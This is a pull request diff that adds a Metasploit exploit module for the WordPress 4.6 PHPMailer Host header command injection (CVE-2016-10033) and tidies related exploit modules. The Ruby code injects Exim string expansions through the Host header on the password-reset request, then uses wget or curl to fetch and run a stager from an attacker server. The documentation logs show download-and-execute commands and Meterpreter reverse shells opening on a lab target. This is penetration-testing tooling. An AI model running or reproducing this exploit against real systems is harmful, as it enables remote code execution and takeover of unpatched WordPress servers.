### PR TITLE
Add WordPress 4.6 PHPMailer exploit

### DIFF
--- a/documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md
+++ b/documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md
@@ -1,7 +1,8 @@
 ## Intro
 
 This vuln has some caveats: you need approximately WordPress 4.6 with
-Exim for the `sendmail(8)` command.
+Exim for the `sendmail(8)` command. You do not need to install
+PHPMailer, as it is included as part of the WordPress install.
 
 Thanks to WP's awesome practice of backporting the heck out of all their
 patches, we need to use a Git clone and check out the vuln release.

--- a/documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md
+++ b/documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md
@@ -1,0 +1,62 @@
+## Intro
+
+This vuln has some caveats: you need approximately WordPress 4.6 with
+Exim for the `sendmail(8)` command.
+
+Thanks to WP's awesome practice of backporting the heck out of all their
+patches, we need to use a Git clone and check out the vuln release.
+
+## Setup
+
+This was tested on Ubuntu. YMMV.
+
+1. got root?
+2. `cd /var/www/html`
+3. `git clone https://github.com/WordPress/WordPress wordpress-4.6`
+4. `chown -R www-data:www-data wordpress-4.6`
+5. `cd wordpress-4.6`
+6. `git checkout 4.6`
+7. Set up a MySQL database for WordPress
+8. Install as normal
+
+## Options
+
+**VERBOSE**
+
+If you'd like to see what requests are being sent, set this to `true`.
+You should see the Exim prestager commands being sent to the target.
+
+## Usage
+
+Please set the payload options. Some sane defaults are set, but you'll
+want to be as specific as possible.
+
+```
+msf > use exploit/unix/webapp/wp_phpmailer_host_header 
+msf exploit(wp_phpmailer_host_header) > set rhost 192.168.33.152
+rhost => 192.168.33.152
+msf exploit(wp_phpmailer_host_header) > set targeturi /wordpress-4.6
+targeturi => /wordpress-4.6
+msf exploit(wp_phpmailer_host_header) > set payload linux/x64/meterpreter_reverse_https
+payload => linux/x64/meterpreter_reverse_https
+msf exploit(wp_phpmailer_host_header) > set lhost 192.168.33.1
+lhost => 192.168.33.1
+msf exploit(wp_phpmailer_host_header) > set verbose true
+verbose => true
+msf exploit(wp_phpmailer_host_header) > run
+
+[*] Started HTTPS reverse handler on https://192.168.33.1:8443
+[*] WordPress 4.7 installed at http://192.168.33.152/wordpress-4.6
+[*] Generating wget command stager
+[*] Using URL: http://0.0.0.0:8080/gzayjqwr
+[*] Local IP: http://192.168.1.7:8080/gzayjqwr
+[*] Generating and sending Exim prestager
+[*] Sending /bin/sh -c ${reduce{get /gzayjqwr http/1.0}{${run{/bin/echo}}}{${extract{-1}{$value}{${readsocket{inet:192.168.33.1:8080}{$item$value$value}}}}}}
+[*] https://192.168.33.1:8443 handling request from 192.168.33.152; (UUID: bwm9z08k) Redirecting stageless connection from /Dbyg6-yOlTQo9i70ceSG0wDDy1JAZjOS5ToQyoXw4zXBnF with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
+[*] https://192.168.33.1:8443 handling request from 192.168.33.152; (UUID: bwm9z08k) Attaching orphaned/stageless session...
+[*] Meterpreter session 1 opened (192.168.33.1:8443 -> 192.168.33.152:35138) at 2017-05-10 01:07:35 -0500
+[*] Sending /bin/rm -f /tmp/ovcixpnf
+[*] Server stopped.
+
+meterpreter > 
+```

--- a/documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md
+++ b/documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md
@@ -29,34 +29,31 @@ You should see the Exim prestager commands being sent to the target.
 
 ## Usage
 
-Please set the payload options. Some sane defaults are set, but you'll
-want to be as specific as possible.
-
 ```
 msf > use exploit/unix/webapp/wp_phpmailer_host_header 
-msf exploit(wp_phpmailer_host_header) > set rhost 192.168.33.152
-rhost => 192.168.33.152
+msf exploit(wp_phpmailer_host_header) > set rhost 192.168.33.135
+rhost => 192.168.33.135
 msf exploit(wp_phpmailer_host_header) > set targeturi /wordpress-4.6
 targeturi => /wordpress-4.6
-msf exploit(wp_phpmailer_host_header) > set payload linux/x64/meterpreter_reverse_https
-payload => linux/x64/meterpreter_reverse_https
-msf exploit(wp_phpmailer_host_header) > set lhost 192.168.33.1
+msf exploit(wp_phpmailer_host_header) > set lhost 192.168.33.1 
 lhost => 192.168.33.1
 msf exploit(wp_phpmailer_host_header) > set verbose true
 verbose => true
 msf exploit(wp_phpmailer_host_header) > run
 
 [*] Started HTTPS reverse handler on https://192.168.33.1:8443
-[*] WordPress 4.7 installed at http://192.168.33.152/wordpress-4.6
+[*] WordPress 4.6 installed at http://192.168.33.135/wordpress-4.6
 [*] Generating wget command stager
-[*] Using URL: http://0.0.0.0:8080/gzayjqwr
-[*] Local IP: http://192.168.1.7:8080/gzayjqwr
+[*] Using URL: http://0.0.0.0:8080/gdydmrcr
+[*] Local IP: http://192.168.1.7:8080/gdydmrcr
 [*] Generating and sending Exim prestager
-[*] Sending /bin/sh -c ${reduce{get /gzayjqwr http/1.0}{${run{/bin/echo}}}{${extract{-1}{$value}{${readsocket{inet:192.168.33.1:8080}{$item$value$value}}}}}}
-[*] https://192.168.33.1:8443 handling request from 192.168.33.152; (UUID: bwm9z08k) Redirecting stageless connection from /Dbyg6-yOlTQo9i70ceSG0wDDy1JAZjOS5ToQyoXw4zXBnF with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
-[*] https://192.168.33.1:8443 handling request from 192.168.33.152; (UUID: bwm9z08k) Attaching orphaned/stageless session...
-[*] Meterpreter session 1 opened (192.168.33.1:8443 -> 192.168.33.152:35138) at 2017-05-10 01:07:35 -0500
-[*] Sending /bin/rm -f /tmp/ovcixpnf
+[*] Sending /bin/sh -c ${reduce{get /gdydmrcr http/1.0}{${run{/bin/echo}}}{${extract{-1}{$value}{${readsocket{inet:192.168.33.1:8080}{$item$value$value}}}}}}
+[+] Sending wget${IFS}-qO${IFS}/tmp/kmbrvask${IFS}http://192.168.33.1:8080/gdydmrcr;chmod${IFS}+x${IFS}/tmp/kmbrvask;/tmp/kmbrvask;rm${IFS}-f${IFS}/tmp/kmbrvask
+[+] Sending payload linux/x64/meterpreter_reverse_https
+[*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: kavaks2e) Redirecting stageless connection from /z1Br4gDetykqSyxJc1FJDwUxRwi0zlaU3n8a4qzqQL0car3RRVt6pALb6kN5pFHhGyIHhgaEWcUYZqRQooYIhJarLi5v0 with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
+[*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: kavaks2e) Attaching orphaned/stageless session...
+[*] Meterpreter session 1 opened (192.168.33.1:8443 -> 192.168.33.135:35848) at 2017-05-15 21:26:17 -0500
+[*] Sending /bin/rm -f /tmp/kmbrvask
 [*] Server stopped.
 
 meterpreter > 

--- a/documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md
+++ b/documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md
@@ -44,17 +44,17 @@ msf exploit(wp_phpmailer_host_header) > run
 [*] Started HTTPS reverse handler on https://192.168.33.1:8443
 [*] WordPress 4.6 installed at http://192.168.33.135/wordpress-4.6
 [*] Generating wget command stager
-[*] Using URL: http://0.0.0.0:8080/gdydmrcr
-[*] Local IP: http://192.168.1.7:8080/gdydmrcr
+[*] Using URL: http://0.0.0.0:8080/mbpvuuck
+[*] Local IP: http://[redacted]:8080/mbpvuuck
 [*] Generating and sending Exim prestager
-[*] Sending /bin/sh -c ${reduce{get /gdydmrcr http/1.0}{${run{/bin/echo}}}{${extract{-1}{$value}{${readsocket{inet:192.168.33.1:8080}{$item$value$value}}}}}}
-[+] Sending wget${IFS}-qO${IFS}/tmp/kmbrvask${IFS}http://192.168.33.1:8080/gdydmrcr;chmod${IFS}+x${IFS}/tmp/kmbrvask;/tmp/kmbrvask;rm${IFS}-f${IFS}/tmp/kmbrvask
+[*] Sending /bin/sh -c ${run{/bin/echo}{${extract{-1}{$value}{${readsocket{inet:192.168.33.1:8080}{get /mbpvuuck http/1.0$value$value}}}}}}
+[+] Sending wget${IFS}-qO${IFS}/tmp/vfotastd${IFS}http://192.168.33.1:8080/mbpvuuck;chmod${IFS}+x${IFS}/tmp/vfotastd;/tmp/vfotastd;rm${IFS}-f${IFS}/tmp/vfotastd
 [+] Sending payload linux/x64/meterpreter_reverse_https
-[*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: kavaks2e) Redirecting stageless connection from /z1Br4gDetykqSyxJc1FJDwUxRwi0zlaU3n8a4qzqQL0car3RRVt6pALb6kN5pFHhGyIHhgaEWcUYZqRQooYIhJarLi5v0 with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
-[*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: kavaks2e) Attaching orphaned/stageless session...
-[*] Meterpreter session 1 opened (192.168.33.1:8443 -> 192.168.33.135:35848) at 2017-05-15 21:26:17 -0500
-[*] Sending /bin/rm -f /tmp/kmbrvask
+[*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: xyx88vod) Redirecting stageless connection from /nBwfbdUYNjU2TjBMb1VkagG08CfJO-jZYpOxBsWHQMGHh7p5ISjCG3Ze with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
+[*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: xyx88vod) Attaching orphaned/stageless session...
+[*] Meterpreter session 1 opened (192.168.33.1:8443 -> 192.168.33.135:36075) at 2017-05-16 14:25:28 -0500
+[*] Sending /bin/rm -f /tmp/vfotastd
 [*] Server stopped.
 
-meterpreter > 
+meterpreter >  
 ```

--- a/documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md
+++ b/documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md
@@ -8,7 +8,7 @@ patches, we need to use a Git clone and check out the vuln release.
 
 ## Setup
 
-This was tested on Ubuntu. YMMV.
+This was tested on Ubuntu 15.04. YMMV.
 
 1. got root?
 2. `cd /var/www/html`

--- a/lib/rex/proto/http/client_request.rb
+++ b/lib/rex/proto/http/client_request.rb
@@ -171,17 +171,21 @@ class ClientRequest
     req << set_uri_append()
     req << set_uri_version_spacer()
     req << set_version
-    req << set_host_header
+
+    # Set a default Host header if one wasn't passed in
+    unless opts['headers'] && opts['headers'].keys.map { |x| x.downcase }.include?('host')
+      req << set_host_header
+    end
 
     # If an explicit User-Agent header is set, then use that instead of
     # the default
-    unless opts['headers'] and opts['headers'].keys.map{|x| x.downcase }.include?('user-agent')
+    unless opts['headers'] && opts['headers'].keys.map { |x| x.downcase }.include?('user-agent')
       req << set_agent_header
     end
 
     # Similar to user-agent, only add an automatic auth header if a
     # manual one hasn't been provided
-    unless opts['headers'] and opts['headers'].keys.map{|x| x.downcase }.include?('authorization')
+    unless opts['headers'] && opts['headers'].keys.map { |x| x.downcase }.include?('authorization')
       req << set_auth_header
     end
 

--- a/lib/rex/proto/http/request.rb
+++ b/lib/rex/proto/http/request.rb
@@ -70,7 +70,7 @@ class Request < Packet
   # Updates the command parts for this specific packet type.
   #
   def update_cmd_parts(str)
-    if (md = str.match(/^(.+?)\s+(.+?)\s+HTTP\/(.+?)\r?\n?$/))
+    if (md = str.match(/^(.+?)\s+(.+?)\s+HTTP\/(.+?)\r?\n?$/i))
       self.method  = md[1]
       self.raw_uri = URI.decode(md[2])
       self.proto   = md[3]

--- a/modules/exploits/linux/http/nagios_xi_chained_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_chained_rce.rb
@@ -11,38 +11,28 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'            => 'Nagios XI Chained Remote Code Execution',
-      'Description'     => %q{
+      'Name'           => 'Nagios XI Chained Remote Code Execution',
+      'Description'    => %q{
         This module exploits an SQL injection, auth bypass, file upload,
         command injection, and privilege escalation in Nagios XI <= 5.2.7
         to pop a root shell.
       },
-      'Author'          => [
+      'Author'         => [
         'Francesco Oddo', # Vulnerability discovery
         'wvu'             # Metasploit module
       ],
-      'References'      => [
+      'References'     => [
         ['EDB', '39899']
       ],
-      'DisclosureDate'  => 'Mar 6 2016',
-      'License'         => MSF_LICENSE,
-      'Platform'        => 'unix',
-      'Arch'            => ARCH_CMD,
-      'Privileged'      => true,
-      'Payload'         => {
-        'Compat'        => {
-          'PayloadType' => 'cmd cmd_bash',
-          'RequiredCmd' => 'generic bash-tcp php perl python openssl gawk'
-        }
-      },
-      'Targets'         => [
+      'DisclosureDate' => 'Mar 6 2016',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Privileged'     => true,
+      'Targets'        => [
         ['Nagios XI <= 5.2.7', version: Gem::Version.new('5.2.7')]
       ],
-      'DefaultTarget'   => 0,
-      'DefaultOptions'  => {
-        'PAYLOAD'       => 'cmd/unix/reverse_bash',
-        'LHOST'         => Rex::Socket.source_address
-      }
+      'DefaultTarget'  => 0
     ))
 
     register_options([

--- a/modules/exploits/unix/fileformat/imagemagick_delegate.rb
+++ b/modules/exploits/unix/fileformat/imagemagick_delegate.rb
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit
         target[:template]
       ))
     rescue Errno::ENOENT
-      fail_with(Failure::BadConfig, "Target has no #{t} support")
+      fail_with(Failure::NoTarget, "Target has no #{t} support")
     end
   end
 

--- a/modules/exploits/unix/fileformat/imagemagick_delegate.rb
+++ b/modules/exploits/unix/fileformat/imagemagick_delegate.rb
@@ -11,8 +11,8 @@ class MetasploitModule < Msf::Exploit
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'            => 'ImageMagick Delegate Arbitrary Command Execution',
-      'Description'     => %q{
+      'Name'           => 'ImageMagick Delegate Arbitrary Command Execution',
+      'Description'    => %q{
         This module exploits a shell command injection in the way "delegates"
         (commands for converting files) are processed in ImageMagick versions
         <= 7.0.1-0 and <= 6.9.3-9 (legacy).
@@ -28,13 +28,13 @@ class MetasploitModule < Msf::Exploit
         If USE_POPEN is set to true, a |-prefixed command will be used for the
         exploit. No delegates are involved in this exploitation.
       },
-      'Author'          => [
+      'Author'         => [
         'stewie',            # Vulnerability discovery
         'Nikolay Ermishkin', # Vulnerability discovery
         'wvu',               # Metasploit module
         'hdm'                # Metasploit module
       ],
-      'References'      => [
+      'References'     => [
         %w{CVE 2016-3714},
         %w{CVE 2016-7976},
         %w{URL https://imagetragick.com/},
@@ -44,30 +44,20 @@ class MetasploitModule < Msf::Exploit
         %w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456},
         %w{URL http://permalink.gmane.org/gmane.comp.security.oss.general/19669}
       ],
-      'DisclosureDate'  => 'May 3 2016',
-      'License'         => MSF_LICENSE,
-      'Platform'        => 'unix',
-      'Arch'            => ARCH_CMD,
-      'Privileged'      => false,
-      'Payload'         => {
-        'BadChars'      => "\x22\x27\x5c", # ", ', and \
-        'Compat'        => {
-          'PayloadType' => 'cmd cmd_bash',
-          'RequiredCmd' => 'generic netcat bash-tcp'
-        }
+      'DisclosureDate' => 'May 3 2016',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Privileged'     => false,
+      'Payload'        => {
+        'BadChars'     => "\x22\x27\x5c" # ", ', and \
       },
-      'Targets'         => [
+      'Targets'        => [
         ['SVG file', template: 'msf.svg'], # convert msf.png msf.svg
         ['MVG file', template: 'msf.mvg'], # convert msf.svg msf.mvg
         ['PS file',  template: 'msf.ps']   # PoC from taviso
       ],
-      'DefaultTarget'   => 0,
-      'DefaultOptions'  => {
-        'PAYLOAD'               => 'cmd/unix/reverse_netcat',
-        'LHOST'                 => Rex::Socket.source_address,
-        'DisablePayloadHandler' => false,
-        'WfsDelay'              => 9001
-      }
+      'DefaultTarget'  => 0
     ))
 
     register_options([

--- a/modules/exploits/unix/local/exim_perl_startup.rb
+++ b/modules/exploits/unix/local/exim_perl_startup.rb
@@ -9,37 +9,33 @@ class MetasploitModule < Msf::Exploit::Local
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'            => 'Exim "perl_startup" Privilege Escalation',
-      'Description'     => %q{
+      'Name'           => 'Exim "perl_startup" Privilege Escalation',
+      'Description'    => %q{
         This module exploits a Perl injection vulnerability in Exim < 4.86.2
         given the presence of the "perl_startup" configuration parameter.
       },
-      'Author'          => [
+      'Author'         => [
         'Dawid Golunski', # Vulnerability discovery
         'wvu'             # Metasploit module
       ],
-      'References'      => [
+      'References'     => [
         %w{CVE 2016-1531},
         %w{EDB 39549},
         %w{URL http://www.exim.org/static/doc/CVE-2016-1531.txt}
       ],
-      'DisclosureDate'  => 'Mar 10 2016',
-      'License'         => MSF_LICENSE,
-      'Platform'        => 'unix',
-      'Arch'            => ARCH_CMD,
-      'SessionTypes'    => %w{shell meterpreter},
-      'Privileged'      => true,
-      'Payload'         => {
-        'BadChars'      => "\x22\x27", # " and '
-        'Compat'        => {
-          'PayloadType' => 'cmd cmd_bash',
-          'RequiredCmd' => 'generic netcat netcat-e bash-tcp telnet'
-        }
+      'DisclosureDate' => 'Mar 10 2016',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'SessionTypes'   => %w{shell meterpreter},
+      'Privileged'     => true,
+      'Payload'        => {
+        'BadChars'     => "\x22\x27" # " and '
       },
-      'Targets'         => [
+      'Targets'        => [
         ['Exim < 4.86.2', {}]
       ],
-      'DefaultTarget'   => 0
+      'DefaultTarget'  => 0
     ))
   end
 

--- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
+++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
@@ -111,9 +111,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # This is basically sh -c `wget` implemented using Exim string expansions
     # Badchars we can't encode away: \ for \n (newline) and : outside strings
-    prestager << "/bin/sh -c ${reduce{get #{get_resource} http/1.0}" \
-      '{${run{/bin/echo}}}{${extract{-1}{$value}{${readsocket' \
-      "{inet:#{srvhost_addr}:#{srvport}}{$item$value$value}}}}}}"
+    prestager << '/bin/sh -c ${run{/bin/echo}{${extract{-1}{$value}' \
+      "{${readsocket{inet:#{srvhost_addr}:#{srvport}}" \
+      "{get #{get_resource} http/1.0$value$value}}}}}}"
 
     # CmdStager should rm the file, but it blocks on the payload, so we do it
     prestager << "/bin/rm -f #{cmdstager_path}"

--- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
+++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
@@ -137,7 +137,9 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     if res && !res.redirect?
-      if res.code == 400 && res.headers['Server'] =~ /^Apache/
+      if res.code == 200
+        fail_with(Failure::NoAccess, 'WordPress username may be incorrect')
+      elsif res.code == 400 && res.headers['Server'] =~ /^Apache/
         fail_with(Failure::NotVulnerable, 'HttpProtocolOptions may be Strict')
       else
         fail_with(Failure::UnexpectedReply, "Server returned code #{res.code}")

--- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
+++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
@@ -181,9 +181,11 @@ class MetasploitModule < Msf::Exploit::Remote
   # Return CmdStager on first request, payload on second
   def on_request_uri(cli, request)
     if @cmdstager
+      print_good("Sending #{@cmdstager}")
       send_response(cli, @cmdstager)
       @cmdstager = nil
     else
+      print_good("Sending payload #{datastore['PAYLOAD']}")
       super
     end
   end

--- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
+++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
@@ -5,7 +5,8 @@
 
 class MetasploitModule < Msf::Exploit::Remote
 
-  Rank = NormalRanking
+  # XXX: Various Apache versions are returning 400 for a Host header with parens
+  Rank = AverageRanking
 
   include Msf::Exploit::Remote::HTTP::Wordpress
   include Msf::Exploit::CmdStager

--- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
+++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
@@ -25,7 +25,8 @@ class MetasploitModule < Msf::Exploit::Remote
       ],
       'References'          => [
         ['CVE', '2016-10033'],
-        ['URL', 'https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html']
+        ['URL', 'https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html'],
+        ['URL', 'http://www.exim.org/exim-html-current/doc/html/spec_html/ch-string_expansions.html']
       ],
       'DisclosureDate'      => 'May 3 2017',
       'License'             => MSF_LICENSE,

--- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
+++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
@@ -75,6 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
+    # Since everything goes through strtolower(), we need lowercase
     print_status("Generating #{cmdstager_flavor} command stager")
     @cmdstager = generate_cmdstager(
       'Path'   => "/#{Rex::Text.rand_text_alpha_lower(8)}",
@@ -99,6 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
     prestager = []
 
     # This is basically sh -c `wget` implemented using Exim string expansions
+    # Badchars we can't encode away: \ for \n (newline) and : outside strings
     prestager << "/bin/sh -c ${reduce{get #{get_resource} http/1.0}" \
       '{${run{/bin/echo}}}{${extract{-1}{$value}{${readsocket' \
       "{inet:#{srvhost_addr}:#{srvport}}{$item$value$value}}}}}}"
@@ -132,6 +134,7 @@ class MetasploitModule < Msf::Exploit::Remote
     exim_payload << " #{Rex::Text.rand_text_alpha(8)})"
   end
 
+  # We can encode away the following badchars using string expansions
   def encode_exim_payload(command)
     command.gsub(/[\/ :]/,
       '/' => '${substr{0}{1}{$spool_directory}}',

--- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
+++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
@@ -136,9 +136,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
-    if res.nil?
-      fail_with(Failure::NotFound, 'Server returned nil response')
-    elsif res && !res.redirect?
+    if res && !res.redirect?
       if res.code == 400 && res.headers['Server'].start_with?('Apache')
         fail_with(Failure::NotVulnerable, 'HttpProtocolOptions may be Strict')
       else

--- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
+++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
@@ -18,6 +18,8 @@ class MetasploitModule < Msf::Exploit::Remote
         version 4.6 with Exim as an MTA via a spoofed Host header to PHPMailer.
 
         A valid WordPress username is required to exploit the vulnerability.
+        Additionally, due to the altered Host header, exploitation is limited to
+        the default virtual host, assuming the header isn't mangled in transit.
       },
       'Author'              => [
         'Dawid Golunski', # Vulnerability discovery

--- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
+++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
@@ -137,9 +137,13 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     if res.nil?
-      fail_with(Failure::UnexpectedReply, 'Server returned nil response')
+      fail_with(Failure::NotFound, 'Server returned nil response')
     elsif res && !res.redirect?
-      fail_with(Failure::UnexpectedReply, "Server returned code #{res.code}")
+      if res.code == 400 && res.headers['Server'].start_with?('Apache')
+        fail_with(Failure::NotVulnerable, 'HttpProtocolOptions may be Strict')
+      else
+        fail_with(Failure::UnexpectedReply, "Server returned code #{res.code}")
+      end
     end
 
     res

--- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
+++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
@@ -54,6 +54,8 @@ class MetasploitModule < Msf::Exploit::Remote
     register_advanced_options([
       OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
     ])
+
+    deregister_options('VHOST')
   end
 
   def check

--- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
+++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
       ],
       'DefaultTarget'       => 0,
       'DefaultOptions'      => {
-        'PAYLOAD'           => 'linux/x86/meterpreter_reverse_https',
+        'PAYLOAD'           => 'linux/x64/meterpreter_reverse_https',
         'LHOST'             => Rex::Socket.source_address,
         'CMDSTAGER::FLAVOR' => 'wget'
       },

--- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
+++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
@@ -1,0 +1,180 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'                => 'WordPress PHPMailer Host Header Command Injection',
+      'Description'         => %q{
+        This module exploits a command injection vulnerability in WordPress
+        version 4.6 with Exim as an MTA via a spoofed Host header to PHPMailer.
+
+        A valid WordPress username is required to exploit the vulnerability.
+      },
+      'Author'              => [
+        'Dawid Golunski', # Vulnerability discovery
+        'wvu'             # Metasploit module
+      ],
+      'References'          => [
+        ['CVE', '2016-10033'],
+        ['URL', 'https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html']
+      ],
+      'DisclosureDate'      => 'May 3 2017',
+      'License'             => MSF_LICENSE,
+      'Platform'            => 'linux',
+      'Arch'                => [ARCH_X86, ARCH_X64],
+      'Privileged'          => false,
+      'Targets'             => [
+        ['WordPress 4.6 / Exim', {}]
+      ],
+      'DefaultTarget'       => 0,
+      'DefaultOptions'      => {
+        'PAYLOAD'           => 'linux/x86/meterpreter_reverse_https',
+        'LHOST'             => Rex::Socket.source_address,
+        'CMDSTAGER::FLAVOR' => 'wget'
+      },
+      'CmdStagerFlavor'     => ['wget', 'curl']
+    ))
+
+    register_options([
+      OptString.new('USERNAME', [true, 'WordPress username', 'admin'])
+    ])
+
+    register_advanced_options([
+      OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
+    ])
+  end
+
+  def check
+    if (version = wordpress_version)
+      version = Gem::Version.new(version)
+    else
+      return CheckCode::Safe
+    end
+
+    vprint_status("WordPress #{version} installed at #{full_uri}")
+
+    if version <= Gem::Version.new('4.6')
+      CheckCode::Appears
+    else
+      CheckCode::Detected
+    end
+  end
+
+  def exploit
+    if check == CheckCode::Safe
+      print_error("Is WordPress installed at #{full_uri} ?")
+      return
+    end
+
+    print_status("Generating #{cmdstager_flavor} command stager")
+    @cmdstager = generate_cmdstager(
+      'Path' => "/#{Rex::Text.rand_text_alpha_lower(8)}",
+      :ssl   => datastore['SSL'],
+      :temp  => datastore['WritableDir'],
+      :file  => File.basename(cmdstager_path)
+    ).join(';')
+
+    print_status("Generating and sending #{cmdstager_flavor} prestager")
+    generate_prestager(prestager_path).each do |command|
+      vprint_status("Sending #{command}")
+      send_request_payload(command)
+    end
+  end
+
+  #
+  # Exploit methods
+  #
+
+  # Absolute paths are required for prestager commands due to execve(2)
+  def generate_prestager(file)
+    prestager = []
+
+    case cmdstager_flavor
+    when 'wget'
+      options = "-q --no-check-certificate --output-document #{file}"
+    when 'curl'
+      options = "-kso #{file}"
+    end
+
+    prestager << "/usr/bin/#{cmdstager_flavor} #{options} #{get_uri}"
+    prestager << "/bin/sh #{prestager_path}"
+    prestager << "/bin/rm -f #{prestager_path} #{cmdstager_path}"
+
+    prestager
+  end
+
+  def send_request_payload(command)
+    send_request_cgi(
+      'method'        => 'POST',
+      'uri'           => wordpress_url_login,
+      'headers'       => {
+        'Host'        => generate_exim_payload(command)
+      },
+      'vars_get'      => {
+        'action'      => 'lostpassword'
+      },
+      'vars_post'     => {
+        'user_login'  => datastore['USERNAME'],
+        'redirect_to' => '',
+        'wp-submit'   => 'Get New Password'
+      }
+    )
+  end
+
+  def generate_exim_payload(command)
+    exim_payload  = Rex::Text.rand_text_alpha(8)
+    exim_payload << "(#{Rex::Text.rand_text_alpha(8)} "
+    exim_payload << "-be ${run{#{encode_exim_payload(command)}}}"
+    exim_payload << " #{Rex::Text.rand_text_alpha(8)})"
+  end
+
+  def encode_exim_payload(command)
+    command.gsub(/[\/ :]/,
+      '/' => '${substr{0}{1}{$spool_directory}}',
+      ' ' => '${substr{10}{1}{$tod_log}}',
+      ':' => '${substr{13}{1}{$tod_log}}'
+    )
+  end
+
+  #
+  # Utility methods
+  #
+
+  def cmdstager_flavor
+    datastore['CMDSTAGER::FLAVOR']
+  end
+
+  def cmdstager_path
+    @cmdstager_path ||=
+      "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}"
+  end
+
+  def prestager_path
+    @prestager_path ||=
+      "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}"
+  end
+
+  #
+  # Override methods
+  #
+
+  # Return CmdStager on first request, payload on second
+  def on_request_uri(cli, request)
+    if @cmdstager
+      send_response(cli, @cmdstager)
+      @cmdstager = nil
+    else
+      super
+    end
+  end
+
+end

--- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
+++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
@@ -41,7 +41,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultTarget'       => 0,
       'DefaultOptions'      => {
         'PAYLOAD'           => 'linux/x64/meterpreter_reverse_https',
-        'LHOST'             => Rex::Socket.source_address,
         'CMDSTAGER::FLAVOR' => 'wget'
       },
       'CmdStagerFlavor'     => ['wget', 'curl']

--- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
+++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
